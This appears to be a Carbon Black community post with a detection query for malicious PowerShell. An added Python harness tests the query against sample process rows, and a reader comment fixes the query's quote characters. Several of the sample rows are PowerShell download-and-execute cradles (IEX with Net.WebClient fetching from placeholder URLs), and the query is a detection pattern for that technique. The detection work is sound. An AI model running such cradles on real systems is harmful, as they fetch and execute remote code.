
Malicious PowerShell

Description: Detecting malicious PowerShell.

What The Data Shows: Looking for PowerShell command-line arguments that can be linked to malicious executions.

SQL: 

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"   -- encoded-command style arguments (e.g. -enc, -EncodedCommand)
AND cmdline LIKE "%IEX%"     -- IEX, the Invoke-Expression alias
AND cmdline LIKE "%web%"     -- web download helpers (e.g. Net.WebClient)
AND name = "powershell.exe"
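As an added example (not part of the original post and not a Carbon Black artefact), the query above can be exercised offline with Python's sqlite3 module. Audit & Remediation queries run on osquery, which is SQLite-based, so LIKE and `=` behave the same way here as on an endpoint. The `processes` rows, pids and URLs are constructed test data, and string literals are written with single quotes, which osquery also accepts; the `CURLY_QUOTE_SQL` variant reproduces the typographic-quote defect so you can see the parser reject it.

```python
import sqlite3

# Constructed sample rows standing in for the osquery `processes` table
# (only the columns the query touches: pid, name, cmdline).
SAMPLE_PROCESSES = [
    # Hit: 'Encoding', 'IEX' and 'WebClient' are all present and the image name matches.
    (4101, "powershell.exe",
     "powershell.exe -NoP -W Hidden -c IEX ([Text.Encoding]::ASCII.GetString("
     "(New-Object Net.WebClient).DownloadData('http://files.example.invalid/a.txt')))"),
    # Hit: lower case still matches because SQLite LIKE is case-insensitive for ASCII.
    (4102, "powershell.exe",
     "POWERSHELL.EXE -c iex ([text.encoding]::ascii.getstring("
     "(new-object net.webclient).downloaddata('http://files.example.invalid/b.txt')))"),
    # Miss: only the 'enc' substring is present; the AND chain needs all three.
    (4103, "powershell.exe",
     "powershell.exe -NoP -W Hidden -EncodedCommand <base64 placeholder>"),
    # Miss: 'IEX' and 'web' but no 'enc' substring anywhere on the command line.
    (4104, "powershell.exe",
     "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://files.example.invalid/c.txt')"),
    # Miss: `name =` is an exact match, so pwsh.exe (PowerShell 7) is outside this query's scope.
    (4105, "pwsh.exe",
     "pwsh.exe -c IEX ([Text.Encoding]::ASCII.GetString("
     "(New-Object Net.WebClient).DownloadData('http://files.example.invalid/d.txt')))"),
    # Miss: routine administrative use with none of the markers.
    (4106, "powershell.exe", "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"),
]

# The page's query with standard single-quoted string literals. (In SQLite a
# double-quoted token is tried as an identifier first and only falls back to a
# string literal, so single quotes are the unambiguous form.)
MALICIOUS_POWERSHELL_SQL = """
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%enc%'
  AND cmdline LIKE '%IEX%'
  AND cmdline LIKE '%web%'
  AND name = 'powershell.exe'
"""

# The original post's broken form: typographic quotes around the image name.
CURLY_QUOTE_SQL = MALICIOUS_POWERSHELL_SQL.replace(
    "'powershell.exe'", "\u201cpowershell.exe\u201d"
)


def load_processes(rows=SAMPLE_PROCESSES):
    """Build an in-memory table shaped like the columns the query uses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE processes (pid INTEGER, name TEXT, cmdline TEXT)")
    conn.executemany("INSERT INTO processes VALUES (?, ?, ?)", rows)
    return conn


def run_query(sql, rows=SAMPLE_PROCESSES):
    """Run a detection query over the sample rows and return the matching pids."""
    conn = load_processes(rows)
    try:
        return [pid for (pid, _name, _cmdline) in conn.execute(sql)]
    finally:
        conn.close()


def curly_quotes_break_parse(rows=SAMPLE_PROCESSES):
    """True when the typographic-quote variant is rejected by the SQL parser."""
    try:
        run_query(CURLY_QUOTE_SQL, rows)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    print("matching pids:", run_query(MALICIOUS_POWERSHELL_SQL))
    print("curly-quote version rejected:", curly_quotes_break_parse())
```

Rows 4103 to 4106 are the cases worth keeping in mind when tuning this query: every one of the three substrings must appear in plain text on the command line, and the image-name comparison is exact, so PowerShell 7's pwsh.exe is not covered unless the query is extended.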

Query_Admin
Community Manager

Status changed to: Approved

hardcoded
New Contributor

This script is using the right and left double quotation mark characters instead of the quotation mark character. If copied and pasted, the script won't run.

The amended version is:

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"
AND cmdline LIKE "%IEX%"
AND cmdline LIKE "%web%"
AND name = "powershell.exe"

jnelson
Carbon Black Employee

@hardcoded Thanks for catching that and posting a fix! I did fix the original too.